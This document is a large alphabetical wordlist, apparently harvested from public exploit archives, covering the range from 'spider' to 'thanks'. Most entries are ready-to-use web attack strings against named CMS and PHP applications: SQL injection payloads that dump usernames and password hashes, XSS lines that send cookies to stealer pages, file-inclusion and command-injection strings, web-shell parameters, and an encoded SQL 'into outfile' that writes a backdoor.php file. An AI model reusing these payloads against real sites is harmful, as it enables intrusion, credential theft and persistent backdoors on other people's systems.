spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,version(),1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=
spider-calendar-lite.html
spider-event-calendar
spider.htm)\r\n";
spiderlabs
SpiderLabs-ivrrecording.php
spip_acces_doc.php3?id_document=0&file=<?system($_GET[cmd]);?>
[spip_dir]
spip-edu.edres74.net
spip.log%00
spip.log%00 
spip_login.php3?url=[Evil_url]
spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=
spip_rss.php?GLOBALS[type_urls]=
spirate.net
spitfire.clausmuus.de
spitfire_site
splanner
splashAdmin.php
splattforum
s.pl?e=1&subscribe=subscribe&l=..
s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=..
splog
sploits
spongeweb
sponsorslist.php?idfestival=-7 (SQL)
sponsors.php?theme=..
spoolio.co.cc
sport
sports
sports-&-games
sportspanel 2
sportspanel 3
sportsphool
spotlight_detail.php?id=SQL
spotlight.php?id=-999+union+all+select+version(),2,3,4,5--
*sp_password 
sps
sps_admin
".$spserver;
spsNewsletter
sps.php?old=..
SPT
SPT--Advanced.php
SPT--BrowseResources.php?ParentId=<script>alert(document.cookie)<
SPT--ForumTopics.php?forumid=-9+UNION+SELECT+null,UserName,UserPassword,33,44,55+FROM+APUsers+WHERE+UserId=1
SPT--ForumTopics.php?forumid=[SQL]
SPT--QuickSearch.php?ss=<script>alert(document.cookie)<
SPT--UserLogin.php
/?s=publish&m=dynamic&x=blog&page=1"
/?s=publish&m=dynamic&x=blog&page=1" method="post" name="pwn" id="form_addedit" class="form">
spv1
spy.gif?&cmd=cd 
spywall
spywall_db
Spyware
sqd
sql
SQL
.+?{SQL}
[SQL>]
[SQL]
sql1.png
sql2.png
sql2xml.php?PROJECT_ROOT=[Evil_Script]
sql32
sql_backup_2013-02Feb-03
sqlConnect.php?DOCUMENT_ROOT= [LFI]%00
SQLController.php?baseDir=[evilcode]
sql_download.inc.php
sql_fcnsOLD.php?phormationdir=[evil_scripts]
sqli-filter-evasion-cheat-sheet-mysql
sql-injection
SQL_injection
SQL-Injection
[SQL INJECTION
[SQLINJECTION] 
[SQL INJECTION CODE]
[SQL INJECTION CODE] 
sql-injection.html
sql_injection_in_4images.html
sql_injection_in_bloofoxcms_registration_plugin.html
sql_injection_in_clansphere.html
sql_injection_in_comment_rating_wordpress_plugin.html
sql_injection_in_compactcms.html
sql_injection_in_dbhcms.html
sql_injection_in_eclime_1.html
sql_injection_in_elxis_cms_1.html
sql_injection_in_enano_cms.html
sql_injection_in_energine.html
sql_injection_in_eocms.html
sql_injection_in_etomite.html
sql_injection_in_extcalendar_2.html
sql_injection_in_grand_flash_album_galle
sql_injection_in_html_edit_cms.html
sql_injection_in_icebb.html
sql_injection_in_iwantonebutton_wordpres
sql_injection_in_kaibb_1.html
sql_injection_in_kaibb.html
sql_injection_in_lightneasy_1.html
sql_injection_in_lightneasy.html
sql_injection_in_minibb.html
sql_injection_in_phenotype_cms.html
sql_injection_in_phpmysport_1.html
sql_injection_in_phpmysport_2.html
sql_injection_in_phpmysport.html
sql_injection_in_redaxscript.html
sql_injection_in_reos_1.html
sql_injection_in_reos_3.html
sql_injection_in_reos.html
sql_injection_in_runcms.html
sql_injection_in_seo_panel_1.html
sql_injection_in_seo_panel.html
sql_injection_in_sweetrice_cms.html
sql_injection_in_syndeocms.html
sql_injection_in_viscacha.html
sql_injection_in_wp_forum_server_wordpre
sql_injection_in_z_vote_wordpress_plugin.html
SQL_Injection). This
sql_injection_vulnerability_in_cmsqlite_1.html
sql_injection_vulnerability_in_e107_2.html
sql_injection_vulnerability_in_energine.html
sql-injection-vulnerability-in-glfusion
sql_injection_vulnerability_in_lisk_cms_1.html
sqli.php?id=2
sqli.php?sqli=-1337 union select
sqli.php?sqli=2
sqlitewebadmin
sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql
sql.php (To discover that such exploit) 
sqlrun.jsp?sqlstr=[QUERY SQLi]
sqlshell.php
SQLStore.php?_ENV[asicms][path]=
sqltorss
sql_update.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
squal
Square-CMS-66303.html
SQuery
squirrelcart
[squirrelmail dir]
squirrelmail_root_dir
squizlib
src
Src
SReg.php?_ENV[asicms][path]=
%s" % (rhost, filename))
srm
srv
srxclr.php?GLOBALS[CLPath]=[evil_script]
%s:%s
%s%s
%s%sadmin
%s%scomments
/?s{$_SESSION['rand']}$int="));
/?s{$_SESSION['rand']}$int=<?php system(\"$cmd\")?>&e{$_SESSION['rand']}$int";
/?s=settings&x=users" method="post" class="form" name="pwn">
%s%sgallery
%s%s HTTP
%s%sindex.php
%s%sindex.php?option=frontpage&Itemid=passthru($byte)",$serv,$path);
ssi.php?a=out&type=xml&f=0)[SQL-INJECTION] 
ssi.php?a=out&type=xml&f=<script>alert("ALOooooooooo");<
ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
%s%slogin" % (options.target, options.target_path))
%s%s\n"
%s%s\n\n"
%s%s\n\n",argv[1],argv[2]);
%s%s" % (options.target, options.dirPath)
%s%srce.php?cmd=ls\n\n", argv[1], argv[2]);
%s%sregister.php\n"
%s%sshowcat.php?forumid=-1+union+select+ModName+from+modretor",$serv,$path);
%s%sshowcat.php?forumid=-1+union+select+ModPassword+from+modretor",$serv,$path);
%s%s%s",$serv,$path,$string);
st
stable
stack
staff
staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3,4,5,6+from+Staff
staff.php?do=addnew&go=add">
staff.php?do=edit&id=1&go=update>
staff.php?staff_table[]=<?php+phpinfo();?>
staff.php?user=aaa' union select 1,username,password,1,1,1,1,1,1,1,1,1,1 from onecms_users
stahuj
stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
standalone
standalonemanager.php
standard
_standard
standard.php?page=..
standard.php?theme_dir=..
standings.php?ladder[id]=[SQL INj]
stararticle
starbugs.host.sk
starnet
start.asp
startdown
start-download.html
startdown.php?file=..
startdown.php?file=config.inc.php
">Start hacking!<
start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;
start_page.css.php?medium=><script>alert(29837274289742472);<
startpage.php
start.php
start.php?config=alper.inc.php 
start.php?go=rubrik&id=-1
start.php?go=rubrik&id=[SQL]
start.php?id=41.18.9&pos=fcring&title=FCRing%201.3
start.php?id=41.18.9&pos=forum&title=Sinapis%20ForumGstebuch%20<img%20src=
start.php?id=41.18.9&pos=gb&title=Sinapis%20Gstebuch%20<img%20src=
startup.php?CFG_PHPGIGGLE_ROOT=[Shell]
startup.php?CFG[txtsql][class]=[SHELL]
startup.php?root=[[Sh3LL Script]]
stash
stat
StatAdmin
stateprojects
static
static_file_editor.php
staticPage.php?key=";><script>alert(document.cookie)<
staticpages
staticpages.php?sp_id=1'    << here maybe most registr ;)
static.php?page=welcome
statistic.php?lang=[LFI]
statistics-demo
statistics.php
statistics.php?action=hstat_year&page=<script>alert(document.cookie)<
statistics.php?action=hstat_year&year=<script>alert(document.cookie)<
statistics.php?lang=..
statisticsReports
statit
statit.rar \r\n";
statman
stat_modules
stat.php?lastnumber=urlencoded%20text
stats
stats.dtb';
stats_function.php?gfwww=[Shell]
stats.inc.php?include_path=[darkcode]			[»]
stats.mdb
Stats.php
stats.php?account=627'
stats.php?ext="><script>alert(1)<
stats.php?game=cstrike&q=players&page=4'&sort=online&dir=asc
stats.php?graphtype=bar&type=switch
stats.php?host=|id>
stats.php?id=1<script>alert(document.cookie)<
stats.php?name="><script>alert(1)<
stats.php?page='insert+into+counter+(countertitle)+values+('HackedByBgh7 tu bi gu')
stats.php?path_faqe=[INDONESIANCODER]
stats.php&res=1341X1341 
stats.php?root_path=code]
stats.php?vwar_root=[Shell-code]?&cmd=ls
stats_projects-backfill.php?gfwww=[Shell]
status
Status2k
status_image.php?base_url=<script>alert(document.cookie)<
status.inc.php
*&status=N&box=received
*&status=N&box=received 
*&status=&sort=ID&way=ASC&per=5&search_submit=Search
stdconfig.php
ste
stealcookie.php?"%2bdocument.cookie<
stealcookie.php?cookie="
stealcookie.php?"+document.cookie<
stealcookies?"+encodeURI(document.cookie)+"'>here<
stealer.php)";
stealer.php?cookie=" +
stealer.php?cookie=" + document.cookie;<
stealer.php?cookie="+document.cookie;<
stealing.php?cookie=+document.cookie<
steal.php?cookie="+document.cookie<
S?TE.COM
/?step=3 
/?step=4
steps
steve.deftlinux.net"
st-gallery
sticker
sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
st_newsletter
stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
stock
stock_fichiers
stock_movements.php
stocks
stopdesign
storage
Storage
storagedata
storage_graphs2.php?uniqueid=199&what=;cat 
storage_graphs2.php?uniqueid=;ls%20%3E%20
storage_graphs3.php?uniqueid=199&what=;cat 
storage_graphs3.php?uniqueid=;ls%20%3E%20
storage_graphs4.php?uniqueid=199&what=;cat 
storage_graphs4.php?uniqueid=;ls%20%3E%20
storage_graphs.php?uniqueid=199&what=;cat 
storage_graphs.php?uniqueid=;ls%20%3E%20
store
_store
store1
storecat.php?store=[sqli]
store.esellerate.net
storefront.php?user=104&mode=1>"><ScRiPt %0A%0D>alert(528305396116)%3B<
store_info.php?id=999999%20union
StoreLocator
store-locator-le
store_manager.php
store\n\n";
store.php?action=view_product?pid='
store.php?action=view_product?pid=<script>alert('takeshix')<
store.php?rid='
store.php?rid=<script>alert('takeshix')<
store_script.html
stories
stories&type=image&feid=&obfuscate=$aSecret&sessidpass=");
story
story.php?id=2+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user_login,0x3a,user_pass),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+pligg_users--
story.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user_login,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+pligg_users--
story.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user_pass,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+pligg_users--
story.php?skin=..
story.php?skin=[Local File]%00
story\r\n";
stphplibrary
str0ke
straduscms
stradus.eu
strane
strawberry.goodgirl.ru
strcpy.pl
streamearth
streaming-a-broadcasting
stream.php?act=adm&mod=
stream.php?mod=
stream.php?mod=admin&act=conf_list
stream.php?mod=admin&act=lc_file_browser
stream.php?path=
stream.php?path=..
stream.php?stream_type=
'.$string;
stringexpand.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
'+ str(ip) } )
strona.pl
strong>
strong>]
strong>]=nomatter
'+str(rhost)+'
structure.php?backimage="><script>alert(document.cookie)<
structure.php?backimage=whatever&bodycolor="><script>alert(document.cookie)<
structure.php?backimage=whatever&theme="><script>alert(document.cookie)<
structure.php?bodycolor="><script>alert(document.cookie)<
structure.php?logo="><script>alert(document.cookie)<
struttura
student
studenteditor.php?template=..
studentmain.php?session=[sqli]
students
students.php?page=preview&test=1+and+substring(@@version,1,1)=4 False |
students.php?page=preview&test=1+and+substring(@@version,1,1)=5 True  |
students.php?page=preview&test=[sql]			 	 			    |
studienplatztausch.php?sid=[SQL]
studio
studip
stud.usv.ro
stuff
stu.inonu.edu.tr
stuworkdisplay.php?ID=-1) UNION ALL SELECT
style%3E%3C
style>[code]
style.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;
style.css.php?medium=><script>alert(29837274289742472);<
style.css" type="text
style><div style=visibility:visible;><center><h1><font color='white'>Please fix your <
style.php?edit=style">
style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users
style="position:absolute;top:0;left:0;width:999pc;height:999pc"
styles
styles.add-edit.php
style>[SCRIPT]
style><script>alert(document.cookie)<
styles.css [colorScheme parameter]
styles.list.php
styles.php?FONTS=asdf}%0A--><
styles.php?toroot=[evil_scripts]
" style="text-decoration: none">
>" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM<
styleware.eu
***.*****-subang.ac.id
subcategory.php
SubCategory.php?cl=[sql]
subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
".$subdir."
subdir ls -la -p81\r\n";
subdreamer
subirArchivo.php
subirArchivo.php")
subject.php?MainID=[SQL]
Submit
submit.cgi
submitComment.php?DOCUMENT_ROOT= [LFI]%00
submit_diary.php?rootdp=DSecRG&gsLanguage=..
submit_diary.php?rootdp=DSecRG&language_home=..
&submit=Invia";
submit?phase=3&amp;url='+encodeURIComponent(location.href)+'&amp;bodytext=This+site+uses+MiaCMS+-+the+free%2C+open+source+content+management+system+admin%3A21232f297a57a5a743894a0e4a801fc3&amp;
submit.php
submit.php HTTP
submit.php?portnum="
submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23
submit_story.php
submitted.php?[TARGET
submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20                                      
submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20                 
subnet
subnetmask
subpages.php" method="post">
SubPanel
SubPanelViewer.php?GLOBALS[sugarEntry]=1&module=1&record=1&beanList[1]=1&theme=..
subqueries.html
subrion
 - Subrion CMS is a stand-alone PHP content management system that is very easy to use. It comes with a ton of great features including full source editing, per-page permissions, user activity monitoring, and much more.
subscribe.php?cid=' 
subscribe.php?course_id=[sqli]
subscribers.tracking.edit.php?subtrackingid=[SQL]
subscriptionforcedmatrix.php
subscriptionforcedmatrixt
subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
subscriptions.php?myprefs[language]}=[EV!L]
subscriptions.php?thispath=[EV!L]
subs.php                             +
') ? substr($host, 7) : $host;
substring(@@version,1,1)=4
substring(@@version,1,1)=5
subsystem
success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin--
success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
success_story.php?id=[id number][SQL]
suche
sudden.isgreat.org
SugarCE5.0.0
SugarCE5.0Latest
sugarce520j
sugarcrm
sugar_type.add-edit.php
sugar_type.list.php
sugarwebsiteaddress
sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
sug_cat.php?parent_id=SQL
Suggest
suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C
suggest_image.php?cid=[SQL]
suggestions.csv
suggest-link.php?id=-1'
suggest.php
suggest.php?action=addcata5886"><script>alert(1)<
suggest.php?action=addcat&parent=15b2f5"><script>alert(1)<
suggest.php" method="post">
suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()<
suhosin
suite
summary
summary.php
summary.php?opt=1'{SQL HERE}&type=Dist
sumon
sumon-0.7.0
sumon.sourceforge.net
sumvqlro7
sunboard
sunbyte
sunet.dl.sourceforge.net
sunlight.profitux.cz
sunshinestudio.ru<
sunshop
suntzu
suntzu1293.jpg%00
suntzu[1].jpg%00
suntzu.gif.php?cmd=ls%20-la
suntzu.html:\r\n";
suntzu.php
suntzu.php?cmd=cat%20.
suntzu.php?cmd=dir
suntzu.php?CMD=ls%20-la
suntzu.php?&cmd=[your command]       <br>
suntzu.php.xla
sunzi-e.html
supasite
supauteur.php?cat="+document.userdel.id.value;
super
superadmin
superalbert.it
superb-east.dl.sourceforge.net
superb-west.dl.sourceforge.net
superengine.ro
superlink.ps ]
super-mod-system-v3
Super Multimedia Library
supernews
superphotos.info
supersimple.org
supplier
supplier_allocate.php?trans_no=11&trans_type=
supplier_allocation_main.php
supplier_credit.php
supplier_credit.php?New=1&invoice_no=
supplier_inquiry.php
supp_membre.php?choix_membre_supp=polom 
support
Support
support-client-management-systems
supporter
support_files
support.html.php?mosConfig_absolute_path=[shell] " 
support.inc.php?install_root=[Shell]
support.sirium.net
supportsuite
supporttrio
suramcrew.org
surfnet.dl.sourceforge.net
surveillanceView.htm
surveillanceView.htm?viewName=<script>alert(document.cookie)<
survey
survey_edit.php
SurveyFactory.class.php?gfcommon=[Shell]
SurveyHTML.class.php?gfwww=[Shell]
survey.php?sid=[SQL] 
survey.php?SURVEY_ID=[SQL] 
surveypro
SurveyQuestion.class.php?gfcommon=[Shell]
SurveyQuestionFactory.class.php?gfcommon=[Shell]
SurveyResponse.class.php?gfcommon=[Shell]
SurveyResponseFactory.class.php?gfcommon=[Shell]
survey_results_text.php?id=-6
surveys
suscriber-user
/?s=usuarios&accion=registrar"
sux0r.net
sv
svalue
\S+viewtopic.php\S+)#g) {
svn
svn.apache.org
svncommitemail
svncommitemail-init.php?gfplugins=[Shell]
svn.gna.org
svn-history
svn.html
svn.openx.org
svn.participatoryculture.org
svn.php.net
svntracker
svntracker-init.php?gfplugins=[Shell]
svn.wp-plugins.org
svvat.3host.biz
svvat.ir
svvat.ir					        #
sw
/?s=war'axe
swBookmarks
swflash.cab#version=8,0,0,0"
swfupload
s.whatsapp.net
swissfaking.net
switch.dl.sourceforge.net
swoopo_clone.html )
swoopogold
sylvain.pasquet1.free.fr
symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
symphony
symphony-package
syn99.php?
synallasomenos_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
sync
syncategory_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
syndeocms
syndication
[synergiser_path]
syntax-desktop
sys
sys_alias.php?flt_keel="><script>alert(123);<
sys_alias.php?keel_id="><script>alert(123);<
' + sys.argv[1]
' + sys.argv[1] + '
" + sys.argv[1] + "
"+sys.argv[1]+"
" +  sys.argv[1] + sys.argv[2] + "
' + sys.argv[2]
' + sys.argv[2] + '
sysmanager
sysop
sys.php
sys.php)<
sys.php<br>";
syssite
sys_sonad_loetelu.php?flt_keel=<
sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23
_sys_sys--
system
]system
system32
system_admin
System.class.php?gfcommon=[Shell]
 "<? system('id'); ?>" localhost:4001
system.ini
system.ini%00
system.php
system.php3?cmd=[COMMAND] 
system.php?set[template][value]=(your shell)
system.php?set=(your shell)
systems
systems-management-appliance )
 \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]);
systemupload
sys_user
syzygy
szusermgnt
t
t%0d%0a" &>
[t4rg3t]
t6478.html
ta3arof
/?tab=..
tabdyn_visu.class.php?path_om=[Shell]
tab_emplacement.class.php?path_om=[Shell]
/?tab=[FILE]
tabid
table
table><
TABLE><
tabledit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
tabledit_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
table.php?pachtofile=[[Sh3LL Script]]             #
Table.php?sys_conf[path][real]=[Evil_Code]
 tableprefix[default : cpg132_ for v1.3.1 use cpg1d_]' % sys.argv[0]
tables.php 
/?tab=>'><ScRiPt%20%0a%0d>alert("JosS")%3B<
tache.class.php?path_om=[Shell]
tadaam.html%00&from=youpi1&msg=youpi2
tadaam.html the line :
tadbook2
tag>
tag>'
tag'
Tagboards%20(12%20Archivos)
tag.class.php?mycfg=(H)
tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C
[Taget]
<taget>:80
tagging-plugin
/?tagID=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,database())%23
tagit2b
tag_.php
tags
tags%3E
tags.php?action=1+and substring(@@version,1,1)=4 --> False
tags.php?action=1+and substring(@@version,1,1)=5 --> True
tags.php?action=[BSQLi]
tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4--%20
taifajobs
takefreestart.php?tid=242&tid2=-1+union+select+1,2,3,group_concat(user_name,0x3a,user_pass),5,6,7,8+from+admin--&nxtq=true&q_no=1
takehelpans.php?change_status=1&newstatus=war'axe
takehelpans.php?reopen=1&id=waraxe
takeoffedit.php" method="post">
takerequest.php" method="post">
takethankyou.php?id=waraxe
takserver.ir
takserver.ir Sec=128bit or 512 kbps *\r\n";
takserver.ir Sec=99
)!talian script     |
talkback
tally.php
tally.php       E.g : 5
tamper-data
tanklogger
".$targ."
[targ3t]
[Targ3t]
".$targ."archives
".$targ) || die "[-]Cannot connect to Host"; 
target
<target>
" % target
".$target;
[target
[target]
[target]";
{target}
$target
$target\
[tArGeT]
Target
[Target]
[Target]			
[TARGEt]
TARGET
[TARGET]
"+ @target + ":1881
[Target]:2082
target:6080
<target>:80
<target address>
" target="_blank">CuteNews 1.4.1   vulnerability<
" target="_blank">DEVIL TEAM <
[targetbox]
target.domain
targetfile
TARGETFILE.php
".$target.$file_vuln.$sql_query;
targethost
[target_host]
[targethost]
target.host
".$targethost.$dir.$inc.$file;
".$target if ($target !~ 
target.il
Target.il
Target.ir
target.net
target.org
: ' + target + path + '
" + target + path + "
".$target.$path."index.php\r\n";
" + target + path + "wizard
target_pligg_site
$target\r\n";
target.ru
target.ru>';
target.server
targetsite
".$target.$sql_vulnerable.$sql_injection;
target.tld
".$target.$vulnf.$log."%00\n";
target.xx
target.xx:80
target.xxx
".$targ.$path.$expl) || die "[-] Exploit failed ...\n";
".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
tarkus
Tar.php
task
/?task=agent_register
task,cat_view
taskdriver
taskfreak
 (task number 17390)
tasks
Tasks
TasksGroupSearchEngine.class.php?gfwww=[Shell]
task,show_content
TasksHtmlSearchRenderer.class.php?gfwww=[Shell]
TasksSearchQuery.class.php?gfcommon=[Shell]
task_statistics_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
task,view.upload
_tastydir
tastydir-an-ajax-file-manager-and-dir-listing
tatget:(port)
tavi
 [tavi_PATH] 
 [tavi_PATH] img
tavi.sourceforge.net
TaxesPage.class.php?base_path=[evil_scripts]
tax_form&tax_rate_id=2' and '1'='1
tax_inquiry.php
tb
[tBBPath]
tbdev
tbdev-01-01-08
tbg
tbl_administrator
tbl_admins
tblcontent
tbl_ln_user
tblMembers--
tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+115%2C+116%2C+114%2C+105%2C+112%2C+115%2C+108%2C+97%2C+115%2C+104%2C+101%2C+115%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+41%2C+59%2C+63%2C+62%29+into+outfile+%22c%3A%2Fxampp%2Fhtdocs%2Fbackdoor.php%22+--+1">
tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+63%2C+62%29+into+outfile+%22%2Fvar%2Fwww%2Fbackdoor.php%22+--+1">
tbltask_res
t.blueh4g.org
tb.php?tb_id=1&url='
[tbpp_path]
tcal_users
tcexam
tcms_administer_site=SHELL
tcms.asp
t.co
tcwphpalbum.sourceforge.net
td>
td><
TD>
TD><
t-dahmail
t-dahmail.sourceforge.net
tdah.us
tdetails.php?idtourn=[SQL]
td.php?spaw_root=[evil script]
td><script>alert(document.cookie)<
td><td
td><td>'),
TD><TD align="middle" nowrap="nowrap" width=90>cracked<
td><td bgcolor=\#FF0000>([^<]+)<
td><td class="v">(.*)<\
td><td valign=middle width=690    ><input type="button" class="new_button" value="Close Window" onClick="window.close(); return false;"><br><iframe width='95%' src='
td><td width="35%"><b>([^<]+)<
teach.php
team
TeamDigi7al
 , Team Hell
 , Team Hell Crew
team.php
team.php?idteam=1+and+1=1--+ #true
team.php?idteam=1+and+1=2--+ #false
team.php?team_id=-1'
team.rc5-72.php?showlang=..
teams
teams.php?fflteam_id=-1
teams.php?id=1 and 1=1--
teams.php?id=1 and 1=2--
teams.php?id=[SQLi]
teams_structure
teamvh4.png\"><
teamworx
teamworx.mdb
teatro
teatro-1.6.tgz
techblog
technical-details-and-scripts-of-the-wordpress-timthumb-php-hack
technologies.php?id=1
technote1
technote7
techtips
tecon-crew.org
tecon-crew.org | 
tecon-crew.org  (as Member)
teilnehmer.php?lang=[LFI]
teklab_admin
teklador.de
teknoportal
telechargements
telechargements.php&var=accueil    
telechargements.pluxml.org
telecharge.php
telecharger
telecharger.php
telefonie-oplossingen
telemat.die.unifi.it
Telematica-II
telephone
tell_a_friend
tellAFriend.asp?idProduct='
tellafriend.php
tell_a_friend.php?id=-500 union select version()  (Sql)
tellafriend.php?&product='
tellafriend.php?product=1"><script>document.write(document.cookie)<
tellafriend.php?product=1&session="><script>alert(document.cookie)<
tell_frend.php?name=indoushka&email=indoushka%40hotmaill%2Ecom&name1=tchalla06@yahoo.fr&email1=Hussin-x&submitok=1&link=<
Telligent_Editor
tellmatic
tellmatic-1.0.7.tgz?modtime=1196381865&big_mirror=0
tell.php?id=..
tell.php?id=[INDONESIANCODER]
Telmanik_CMS_Press
tematres
temp
temp_autorisation.class.php?path_om=[Shell]
temp_defunt.class.php?path_om=[Shell]
temp_defunt_sansemplacement.class.php?path_om=[Shell]
temp_emplacement.class.php?path_om=[Shell]
temp_files (After Upload )
template
template-cms.ru - Template CMS is a fast and simple content management system written in PHP.
_template_component_admin.php?MOA_PATH=[AvriLhea]          
_template_component_gallery.php?MOA_PATH=[AvriLhea]          
templatecreature
template_csv.php?rInfo[content]=[[Sh3LL Script]]
template_edit.php
template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C
templateie
templateie_install.class.php?skin_file=Hima ||
template\index.php?main_page_directory=  Ev!L C0dE
template\index.php?page_to_include=  Ev!L C0dE
template_monster_download.html<
templatemonster.mdb
templateparser.class.php
_template_parser.php?MOA_PATH=[AvriLhea]          
template.php?action=detail&id=..
template.php?baseAxiomPath=                                         #
template.php?CONFIG[main_path]=[evil_scripts]
template.php?edit_file=
template.php?galleryfilesdir=[Shell]
template.php?page=[attacker]
template.php?path=[[Sh3LL Script]]                #
template.php?path=[[Sh3LL Script]]           #
template.php?provided=[SQL]
template.php?vsDragonRootPath=[cmd_url]
templater.php?config[template]=..
templates
_templates
templates1
templates\add_product
templates_c
Templates?cmd=copy&which=<meta+http-equiv='Set-cookie'+content='userCmd=edit'> 
templates.design-joomla.eu
templates_export.php
templateshares.net
templates.php
template_thumbnail.php?thumb_template=[LFI]
template_thumbnail.php?thumb_template=[SHELL]
template.tpl.php?renderer=..
template.tpl.php?renderer=evilhost
templ.php
temporary
temp.php?use=templates
temps
temp_suntzu1234.php.xxx?cmd=dir
tems
tendersystem
test
test 
test1.php?root=shell
test1.ru
test%20dir
test2.php?root=shell
test2.ru
test3.php?root=shell
test4.php?root=shell
test5.php?root=shell
test6.php?root=shell
test_adodb_lite.php
test_adodb_lite.php HTTP
testalbum
testcase
testcases
test_category&mytable=test_category
tester
tester.php
test.html
test.html 
test.html#
testimonials
test.inc';
testing-umlaut-charaters.html
testlink
testlink> ..
testlink_1.8.5.tgz?use_mirror=nchc
testlink_1.8.5.tgz?use_mirror=nchc)
TestLink%201.8
TestLink%201.8.5
testlink-code
testlink-ga
testlink-multiple-injection-vulnerabilities
testlink-server
testmember
testmember) the script will execute
/?Test&nr=-999
test&pageType=image&image=<script>alert(document.cookie)<
test.php
test.php?
test.php"
test.php"));
test.php%00
test.php&callback=alert(123);
test.php?cmd=id";
test_.php                                                                  I'm horn<br>
test.php.nfo
test.php?PATH_TO_CODE=[SHELL]
test.php.php-1147772503.ext?cmd=ls%20-la
test.php.sql
test.php .  This is very useful for
tests
test_tools
test-vuln.php.jpg
test"; width="560" height="315"
tex
texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+
texed.php?formdata=foo&pathname=foo";ls+-l;echo+"
text
textads_2
TextAds2.php
textarea
textarea>%253cscript>alert%2528document.cookie);%253
textarea%3E%3Cscript%3Ealert('w00t');%3C
textarea&gt;
textarea&gt;<script>alert(document.cookie)<
textarea><ScRiPt%20%0a%0d>alert(213771818860)%3B<
textexchangepro
text-exchange-pro
text_exchange_script.html
textfile
textlinkads
text-link-sales.html ]
textmb
text-only
textos
Textpattern
text.php
text.php?path= [inj3ct0r sh3ll]
text.php?tid=<script>alert(1)<
text.php?tid=[SQL]                                      |
texts
TextSearch?phrase=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E 
textview.php?file=
TFLivre.php
tforum
tftgallery
TFTP-GALLERY-PATH
tgp
tgpinc.php?DOCUMENT_ROOT=[Shell]
tgz
TH3xN3RD
thai
thaiquickcart
thanigga
thankes.php
thanks
thanks.php?skin= [inj3ct0r sh3ll]
